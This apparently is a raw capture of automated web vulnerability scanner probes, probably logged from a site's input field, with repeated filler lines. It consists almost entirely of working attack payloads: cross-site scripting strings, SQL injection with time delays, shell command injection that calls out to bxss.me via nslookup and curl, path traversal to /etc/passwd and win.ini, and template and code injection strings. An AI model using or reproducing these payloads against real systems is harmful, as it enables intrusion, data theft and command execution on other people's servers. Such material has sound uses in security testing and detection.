1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
dfb{{98991*97996}}xca
555
555
dfb[[${98991*97996}]]xca
555
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >w1jd(9533)</ScRiPt>
555
555<WN7WLO>DOJPL[!+!]</WN7WLO>
555
555<script>w1jd(9569)</script>
555
555
555<script>w1jd(9730)</script>9730
555<ScR<ScRiPt>IpT>w1jd(9141)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>w1jd(9258)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9316></ScRiPt>
555
555
555
555<isindex type=image src=1 onerror=w1jd(9637)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9447'>
555
555
555<body onload=w1jd(9490)>
555
555
555
555
555<img src=//xss.bxss.me/t/dot.gif onload=w1jd(9012)>
555
555
555<img src=xyz OnErRor=w1jd(9798)>
555
555<img/src=">" onerror=alert(9302)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%31%6A%64%289782%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\w1jd(9052)\u003C/sCripT\u003E
555<ScRiPt>w1jd(9539)</sCripT>
%F6<img zzz onmouseover=w1jd(99231) //%F6>
555<input autofocus onfocus=w1jd(9694)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(w1jd(9884))}
555XOAnJ
<ScRiPt >w1jd(9938)</ScRiPt>
555<WCGKLA>2SKUK[!+!]</WCGKLA>
555<ifRAme sRc=9161.com></IfRamE>
555<aNBy9CN x=9811>
555
555<img sRc='http://attacker-9770/log.php?
555<a0wVmxc<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
)
-1 OR 5*5=25
-1' OR 5*5=25 --
!(()&&!|*|*|
^(#$!@#$)(()))******
-1" OR 5*5=25 --
555
555
-1' OR 5*5=25 or 'YTE0CNbC'='
555
-1" OR 5*5=25 or "3UMy4JIB"="
555
redirtest.acx
'"()
555*if(now()=sysdate(),sleep(15),0)
555
555'&&sleep(27*1000)*cgvrmd&&'
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555"&&sleep(27*1000)*ujctxy&&"
echo ccizon$()\ edcrui\nz^xyu||a #' &echo ccizon$()\ edcrui\nz^xyu||a #|" &echo ccizon$()\ edcrui\nz^xyu||a #
555'||sleep(27*1000)*pxkvcb||'
&echo wpopft$()\ yglawu\nz^xyu||a #' &echo wpopft$()\ yglawu\nz^xyu||a #|" &echo wpopft$()\ yglawu\nz^xyu||a #
555"||sleep(27*1000)*depqvp||"
555&echo dkrcqb$()\ tepida\nz^xyu||a #' &echo dkrcqb$()\ tepida\nz^xyu||a #|" &echo dkrcqb$()\ tepida\nz^xyu||a #
|echo pgmtxr$()\ uxkfff\nz^xyu||a #' |echo pgmtxr$()\ uxkfff\nz^xyu||a #|" |echo pgmtxr$()\ uxkfff\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555|echo bvvagf$()\ bqkdgm\nz^xyu||a #' |echo bvvagf$()\ bqkdgm\nz^xyu||a #|" |echo bvvagf$()\ bqkdgm\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
555<esi:include src="http://bxss.me/rpb.png"/>
555
file:///etc/passwd
expr 9000602410 - 919945
555
555
(nslookup -q=cname hitrsbelojxyy9e561.bxss.me||curl hitrsbelojxyy9e561.bxss.me))
555
$(nslookup -q=cname hitibgtlinaztaffc3.bxss.me||curl hitibgtlinaztaffc3.bxss.me)
../555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
${9999360+10000360}
555
&nslookup -q=cname hitbiatixnmty9fa3d.bxss.me&'\"`0&nslookup -q=cname hitbiatixnmty9fa3d.bxss.me&`'
555
&(nslookup -q=cname hitualqeimvty8d3ee.bxss.me||curl hitualqeimvty8d3ee.bxss.me)&'\"`0&(nslookup -q=cname hitualqeimvty8d3ee.bxss.me||curl hitualqeimvty8d3ee.bxss.me)&`'
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
|(nslookup -q=cname hitlcqdtgbpfs72fb1.bxss.me||curl hitlcqdtgbpfs72fb1.bxss.me)
555
555
555-1); waitfor delay '0:0:15' --
`(nslookup -q=cname hitkqljimlbase6b62.bxss.me||curl hitkqljimlbase6b62.bxss.me)`
555
555
;(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)|(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)&(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitaxhvaooprkf7248.bxss.me||curl${IFS}hitaxhvaooprkf7248.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitkfpravmnxp6cc71.bxss.me||curl${IFS}hitkfpravmnxp6cc71.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkfpravmnxp6cc71.bxss.me||curl${IFS}hitkfpravmnxp6cc71.bxss.me)&`'
555-1)); waitfor delay '0:0:15' --
555
555
555
555-1 waitfor delay '0:0:15' --
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
/etc/shells
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
../../../../../../../../../../../../../../etc/shells
555Twqwcta9'; waitfor delay '0:0:15' --
555
555
c:/windows/win.ini
555
bxss.me
555
Http://bxss.me/t/fit.txt
555StLwNEjx'); waitfor delay '0:0:15' --
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(111).concat(67)+(require"socket"
Socket.gethostbyname("hitem"+"pknlrjib755ea.bxss.me.")[3].to_s)+"
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
'+'A'.concat(70-3).concat(22*4).concat(110).concat(86).concat(100).concat(66)+(require'socket'
Socket.gethostbyname('hitma'+'cqglczyy07c5a.bxss.me.')[3].to_s)+'
555
';print(md5(31337));$a='
555
'A'.concat(70-3).concat(22*4).concat(98).concat(84).concat(113).concat(73)+(require'socket'
Socket.gethostbyname('hitnl'+'dsqgccta1fa35.bxss.me.')[3].to_s)
555
";print(md5(31337));$a="
555
555Auh7KntJ')); waitfor delay '0:0:15' --
555
555
${@print(md5(31337))}
555
555
HttP://bxss.me/t/xss.html?%00
555
${@print(md5(31337))}\
huong-dan-u-rac-thai-huu-co-tai-nha
555
bxss.me/t/xss.html?%00
'.print(md5(31337)).'
555
555
555-1 OR 529=(SELECT 529 FROM PG_SLEEP(15))--
555
555
555
555
huong-dan-u-rac-thai-huu-co-tai-nha/.
555
555
555-1) OR 706=(SELECT 706 FROM PG_SLEEP(15))--
555
555
555
555-1)) OR 757=(SELECT 757 FROM PG_SLEEP(15))--
555
555
555HtHXQd6R' OR 178=(SELECT 178 FROM PG_SLEEP(15))--
555
555obx26n9s') OR 608=(SELECT 608 FROM PG_SLEEP(15))--
555TVpa94Od')) OR 125=(SELECT 125 FROM PG_SLEEP(15))--
'.gethostbyname(lc('hitrx'.'dhoourjo4c425.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(119).chr(71).'
555'"()&%<zzz><ScRiPt >viV5(9723)</ScRiPt>
555
".gethostbyname(lc("hitqj"."xiwxzise2597c.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(79).chr(103).chr(66)."
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
gethostbyname(lc('hitsd'.'askcqxvx863e7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(72).chr(104).chr(68)
555
555
'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'"()&%<zzz><ScRiPt >viV5(9696)</ScRiPt>
<!--
555
555
555'"
555
555
555%C0%A7%C0%A2%2527%2522\'\"
@@fiUjj
5559296266
(select 198766*667891)
(select 198766*667891 from DUAL)
555
bfg8180<s1﹥s2ʺs3ʹhjl8180
555
555
response.write(9860443*9935153)
555
'+response.write(9860443*9935153)+'
555'"()&%<zzz><ScRiPt >BF3G(9642)</ScRiPt>
"+response.write(9860443*9935153)+"
555
<% response.write(9860443*9935153) %>
bfgx8946%C0%BEz1%C0%BCz2a%90bcxhjl8946
555
555
+response.write(9860443*9935153)'
555
555
555
555
555
'"()&%<zzz><ScRiPt >BF3G(9110)</ScRiPt>
555
<%={{={@{#{${dfb}}%>
555
555
555
5559330446
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >viV5(9746)</ScRiPt>
555
555<WANRPB>GGO5N[!+!]</WANRPB>
555
555<script>viV5(9925)</script>
555
555<script>viV5(9076)</script>9076
555
555<ScR<ScRiPt>IpT>viV5(9338)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>viV5(9742)</ScRiPt>
555
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9133></ScRiPt>
555
555
555
555
555
555<isindex type=image src=1 onerror=viV5(9287)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9735'>
555<body onload=viV5(9930)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=viV5(9548)>
555
555
555<img src=xyz OnErRor=viV5(9946)>
555
555<img/src=">" onerror=alert(9424)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%76%69%56%35%289145%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\viV5(9922)\u003C/sCripT\u003E
555<ScRiPt>viV5(9938)</sCripT>
%F6<img zzz onmouseover=viV5(98841) //%F6>
555<input autofocus onfocus=viV5(9772)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(viV5(9424))}
555Tazpb
<ScRiPt >viV5(9927)</ScRiPt>
555<WONU2G>2JEXP[!+!]</WONU2G>
555<ifRAme sRc=9949.com></IfRamE>
555<aRNNvLm x=9666>
555<img sRc='http://attacker-9151/log.php?
555
555<a2gi76i<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
555
-1' OR 5*5=25 --
redirtest.acx
-1" OR 5*5=25 --
555
-1' OR 5*5=25 or '7TeVfTtz'='
-1" OR 5*5=25 or "aVtJyrQ9"="
555
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
echo eknrsq$()\ nmudhn\nz^xyu||a #' &echo eknrsq$()\ nmudhn\nz^xyu||a #|" &echo eknrsq$()\ nmudhn\nz^xyu||a #
555-1; waitfor delay '0:0:15' --
'"()
555'&&sleep(27*1000)*yxjpso&&'
&echo oorqmc$()\ xejcoj\nz^xyu||a #' &echo oorqmc$()\ xejcoj\nz^xyu||a #|" &echo oorqmc$()\ xejcoj\nz^xyu||a #
555-1); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*vklbuw&&"
555&echo pctojb$()\ abhcde\nz^xyu||a #' &echo pctojb$()\ abhcde\nz^xyu||a #|" &echo pctojb$()\ abhcde\nz^xyu||a #
555-1)); waitfor delay '0:0:15' --
../../../../../../../../../../../../../../etc/passwd
555'||sleep(27*1000)*qfyvjw||'
../../../../../../../../../../../../../../windows/win.ini
|echo ryfufi$()\ spamml\nz^xyu||a #' |echo ryfufi$()\ spamml\nz^xyu||a #|" |echo ryfufi$()\ spamml\nz^xyu||a #
${9999518+10000447}
555<esi:include src="http://bxss.me/rpb.png"/>
555-1 waitfor delay '0:0:15' --
file:///etc/passwd
555|echo gthskp$()\ xlbldn\nz^xyu||a #' |echo gthskp$()\ xlbldn\nz^xyu||a #|" |echo gthskp$()\ xlbldn\nz^xyu||a #
555
555"||sleep(27*1000)*avxqbw||"
555
555
expr 9000550302 - 921342
../555
555FT1JUC9I'; waitfor delay '0:0:15' --
555
(nslookup -q=cname hitrcsshnzahobf030.bxss.me||curl hitrcsshnzahobf030.bxss.me))
$(nslookup -q=cname hitotrygvphyted075.bxss.me||curl hitotrygvphyted075.bxss.me)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555v64zHvaY'); waitfor delay '0:0:15' --
555
555wiXmqpKQ')); waitfor delay '0:0:15' --
&nslookup -q=cname hitzulmqaotfjc937a.bxss.me&'\"`0&nslookup -q=cname hitzulmqaotfjc937a.bxss.me&`'
/etc/shells
555
555-1 OR 663=(SELECT 663 FROM PG_SLEEP(15))--
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
&(nslookup -q=cname hitnyxfabypgl9bae0.bxss.me||curl hitnyxfabypgl9bae0.bxss.me)&'\"`0&(nslookup -q=cname hitnyxfabypgl9bae0.bxss.me||curl hitnyxfabypgl9bae0.bxss.me)&`'
../../../../../../../../../../../../../../etc/shells
555-1) OR 739=(SELECT 739 FROM PG_SLEEP(15))--
555
555
c:/windows/win.ini
555-1)) OR 184=(SELECT 184 FROM PG_SLEEP(15))--
|(nslookup -q=cname hitygocrrfvqp6d225.bxss.me||curl hitygocrrfvqp6d225.bxss.me)
555
bxss.me
`(nslookup -q=cname hitirxlswqvtt3a419.bxss.me||curl hitirxlswqvtt3a419.bxss.me)`
555UGYCQmYG' OR 479=(SELECT 479 FROM PG_SLEEP(15))--
555hgNo1HGZ') OR 809=(SELECT 809 FROM PG_SLEEP(15))--
;(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)|(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)&(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)
Http://bxss.me/t/fit.txt
555uTS7I4Hk')) OR 58=(SELECT 58 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
|(nslookup${IFS}-q${IFS}cname${IFS}hitytbrycpwqn4f1ac.bxss.me||curl${IFS}hitytbrycpwqn4f1ac.bxss.me)
http://bxss.me/t/fit.txt?.jpg
&(nslookup${IFS}-q${IFS}cname${IFS}hituchngiknzr31a8a.bxss.me||curl${IFS}hituchngiknzr31a8a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituchngiknzr31a8a.bxss.me||curl${IFS}hituchngiknzr31a8a.bxss.me)&`'
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
"+"A".concat(70-3).concat(22*4).concat(107).concat(70).concat(109).concat(78)+(require"socket"
Socket.gethostbyname("hitdj"+"wvjuqnwz8241b.bxss.me.")[3].to_s)+"
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(108).concat(65).concat(106).concat(83)+(require'socket'
Socket.gethostbyname('hitsd'+'vnzidgvs0cc2a.bxss.me.')[3].to_s)+'
555
555
555'"
'A'.concat(70-3).concat(22*4).concat(111).concat(73).concat(108).concat(84)+(require'socket'
Socket.gethostbyname('hitvp'+'wbltarlgfcbb3.bxss.me.')[3].to_s)
555
555
555
555
555%C0%A7%C0%A2%2527%2522\'\"
555
555
555
555
555
555
@@mzxtO
(select 198766*667891)
555
555
555
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
';print(md5(31337));$a='
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
";print(md5(31337));$a="
${@print(md5(31337))}
555
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
huong-dan-u-rac-thai-huu-co-tai-nha
555
555
huong-dan-u-rac-thai-huu-co-tai-nha/.
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >z7kD(9010)</ScRiPt>
555
555
555
555
555
'.gethostbyname(lc('hitiz'.'evsonfno1aa66.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(120).chr(67).'
'"()&%<zzz><ScRiPt >z7kD(9475)</ScRiPt>
".gethostbyname(lc("hitzr"."ssowatqv422d8.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(72).chr(98).chr(73)."
555
gethostbyname(lc('hitij'.'ujhmarjib78d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(87).chr(113).chr(85)
555
555
555
'"
555
555
5559975830
<!--
555
555
555
555
555
555
bfg7721<s1﹥s2ʺs3ʹhjl7721
555
555
bfgx2186%C0%BEz1%C0%BCz2a%90bcxhjl2186
response.write(9347947*9846425)
'+response.write(9347947*9846425)+'
"+response.write(9347947*9846425)+"
<% response.write(9347947*9846425) %>
+response.write(9347947*9846425)'
<%={{={@{#{${dfb}}%>
555
555
555
555
555
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >z7kD(9828)</ScRiPt>
555'"()&%<zzz><ScRiPt >ddBq(9128)</ScRiPt>
555<WIZJZP>DXCGJ[!+!]</WIZJZP>
555
'"()&%<zzz><ScRiPt >ddBq(9454)</ScRiPt>
555<script>z7kD(9198)</script>
555<script>z7kD(9035)</script>9035
555
5559267055
555<ScR<ScRiPt>IpT>z7kD(9188)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>z7kD(9901)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9394></ScRiPt>
555<isindex type=image src=1 onerror=z7kD(9918)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9659'>
555
555
555<body onload=z7kD(9659)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=z7kD(9683)>
555
555
555
555
555<img src=xyz OnErRor=z7kD(9191)>
555
555
555
555<img/src=">" onerror=alert(9029)>
555
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%37%6B%44%289112%29%3C%2F%73%43%72%69%70%54%3E
555
555
555\u003CScRiPt\z7kD(9051)\u003C/sCripT\u003E
555
555
555
555<ScRiPt>z7kD(9202)</sCripT>
555
555
%F6<img zzz onmouseover=z7kD(96271) //%F6>
555<input autofocus onfocus=z7kD(9399)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(z7kD(9725))}
5555z2RC
<ScRiPt >z7kD(9549)</ScRiPt>
555<WJJIRA>WVICK[!+!]</WJJIRA>
555<ifRAme sRc=9072.com></IfRamE>
555<azWofS6 x=9377>
555<img sRc='http://attacker-9075/log.php?
555<avtB4Ok<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >o75o(9587)</ScRiPt>
555
'"()&%<zzz><ScRiPt >o75o(9587)</ScRiPt>
555
5559725174
555
bfg1524<s1﹥s2ʺs3ʹhjl1524
555
bfgx6716%C0%BEz1%C0%BCz2a%90bcxhjl6716
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >o75o(9840)</ScRiPt>
555
555<W4SZUZ>6AXFW[!+!]</W4SZUZ>
555
555<script>o75o(9776)</script>
555
555<script>o75o(9594)</script>9594
555
555<ScR<ScRiPt>IpT>o75o(9390)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>o75o(9647)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9670></ScRiPt>
555
555
555<isindex type=image src=1 onerror=o75o(9189)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9968'>
555
555<body onload=o75o(9839)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=o75o(9066)>
555
555<img src=xyz OnErRor=o75o(9217)>
555
555<img/src=">" onerror=alert(9857)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%37%35%6F%289508%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\o75o(9095)\u003C/sCripT\u003E
555
555<ScRiPt>o75o(9248)</sCripT>
555
%F6<img zzz onmouseover=o75o(92331) //%F6>
555
555<input autofocus onfocus=o75o(9261)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(o75o(9946))}
555
555IH5Ht
<ScRiPt >o75o(9368)</ScRiPt>
555
555<WY3VL8>XCTCD[!+!]</WY3VL8>
555
555<ifRAme sRc=9563.com></IfRamE>
555
555<aRtZGD1 x=9115>
555
555<img sRc='http://attacker-9098/log.php?
555
555<aK3X9Zc<